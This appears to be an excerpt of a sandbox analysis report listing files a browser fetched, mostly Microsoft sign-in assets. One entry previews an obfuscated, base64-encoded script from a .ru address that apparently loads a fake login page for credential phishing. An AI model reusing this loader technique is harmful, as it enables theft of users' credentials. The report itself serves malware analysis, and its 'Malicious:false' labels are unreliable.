                                                                      SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                      Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:ASCII text, with very long lines (47520)
                                                                      Category:dropped
                                                                      Size (bytes):47521
                                                                      Entropy (8bit):5.398500199255723
                                                                      Encrypted:false
                                                                      SSDEEP:768:11CQfmIG2Y8rH8zH5ei80aszzQhpd+dr6F/PG2Xv9PL79noBL5o6YBU91KL5Gc05:1a/0H8zH5eJdVplGYv9f96Yjy
                                                                      MD5:301F68F3D8317AB22D4021E266C9A853
                                                                      SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                                                      SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                                                      SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                                      Category:dropped
                                                                      Size (bytes):16345
                                                                      Entropy (8bit):7.98960525258912
                                                                      Encrypted:false
                                                                      SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                                      MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                                      SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                                      SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                                      SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                      Category:downloaded
                                                                      Size (bytes):673
                                                                      Entropy (8bit):7.6596900876595075
                                                                      Encrypted:false
                                                                      SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                      MD5:0E176276362B94279A4492511BFCBD98
                                                                      SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                      SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                      SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                      Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:GIF image data, version 89a, 352 x 3
                                                                      Category:dropped
                                                                      Size (bytes):2672
                                                                      Entropy (8bit):6.640973516071413
                                                                      Encrypted:false
                                                                      SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                      MD5:166DE53471265253AB3A456DEFE6DA23
                                                                      SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                      SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                      SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:1
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                      Category:downloaded
                                                                      Size (bytes):20410
                                                                      Entropy (8bit):7.980582012022051
                                                                      Encrypted:false
                                                                      SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                                      MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                      SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                      SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                      SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                      Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:GIF image data, version 89a, 352 x 3
                                                                      Category:downloaded
                                                                      Size (bytes):2672
                                                                      Entropy (8bit):6.640973516071413
                                                                      Encrypted:false
                                                                      SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                      MD5:166DE53471265253AB3A456DEFE6DA23
                                                                      SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                      SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                      SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                      Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:HTML document, ASCII text
                                                                      Category:downloaded
                                                                      Size (bytes):315
                                                                      Entropy (8bit):5.0572271090563765
                                                                      Encrypted:false
                                                                      SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                                      MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                      SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                      SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                      SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:http://yesmotoring.com.sg/favicon.ico
                                                                      Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                      Category:dropped
                                                                      Size (bytes):5525
                                                                      Entropy (8bit):7.961202222662501
                                                                      Encrypted:false
                                                                      SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                      MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                      SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                      SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                      SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                      Category:downloaded
                                                                      Size (bytes):35170
                                                                      Entropy (8bit):7.993096534744333
                                                                      Encrypted:true
                                                                      SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                      MD5:171A4DD9400708B88724B57D62B24A6A
                                                                      SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                      SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                      SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                                      Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:HTML document, ASCII text, with very long lines (7557), with CRLF line terminators
                                                                      Category:downloaded
                                                                      Size (bytes):19917
                                                                      Entropy (8bit):5.872651843546706
                                                                      Encrypted:false
                                                                      SSDEEP:384:WnuvVD5ZdyFe9VXuomqcRPPnuvVD5ZdyFe9VXuomqcRPelrylrB:XD5Zdoe9BuoGRPuD5Zdoe9BuoGRPelr+
                                                                      MD5:3976ADA693D519768FA833278F07A460
                                                                      SHA1:86EE727E77F2A02D1876EAA525308A2795DACCDB
                                                                      SHA-256:679F0513597BAE5210E33A60A9A1D9CD2C95DAF3DB7B750F7DA487BAB6736709
                                                                      SHA-512:9DE847E35807511089398C93B55319A932BD7508EB527A2E802BF27DC2215D66BA9D09A9DBF14EC42DD36CE77917A3FBB2B2735920DAD292EDF484C7C782C4D7
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://y7.novenef.ru/Lj9e/
                                                                      Preview:<script>../* I find that the harder I work, the more luck I seem to have. */..if(atob("aHR0cHM6Ly9WYi5ub3ZlbmVmLnJ1L0xqOWUv") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiA
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                                      Category:downloaded
                                                                      Size (bytes):16345
                                                                      Entropy (8bit):7.98960525258912
                                                                      Encrypted:false
                                                                      SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                                      MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                                      SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                                      SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                                      SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_i8f-75gfk3tbsm8bmatnqa2.js
                                                                      Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                      Category:dropped
                                                                      Size (bytes):673
                                                                      Entropy (8bit):7.6596900876595075
                                                                      Encrypted:false
                                                                      SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                      MD5:0E176276362B94279A4492511BFCBD98
                                                                      SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                      SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                      SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:PNG image data, 17 x 20, 8-bit/color RGB, non-interlaced
                                                                      Category:dropped
                                                                      Size (bytes):61
                                                                      Entropy (8bit):4.035372245524405
                                                                      Encrypted:false
                                                                      SSDEEP:3:yionv//thPl8r4J6yxl/k4E08up:6v/lhP6E0y7Tp
                                                                      MD5:9EBEEF0B5724D20428C2454C89DD231F
                                                                      SHA1:8E46EF0ED179148C8A0A9339307117CCD5C70313
                                                                      SHA-256:D4332DDD067116EF7FA8FA7E23FFCC00C40E41F794D0635B6C056F493050ED98
                                                                      SHA-512:922F8CF1C3B3003B21BB89BAA7F278E99A600A9C0F6895E970660088821BB11449FE6E1CD000DE7AA41E9DE7F07B13CB6C1E279110B2262201BC9E2F6E3C8EBA
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:.PNG........IHDR...............A.....IDAT.....$.....IEND.B`.
                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      File Type:GIF image data, version 89a, 352 x 3
                                                                      Category:downloaded
                                                                      Size (bytes):3620
                                                                      Entropy (8bit):6.867828878374734
                                                                      Encrypted:false
                                                                      SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                      MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                      SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                      SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                      SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
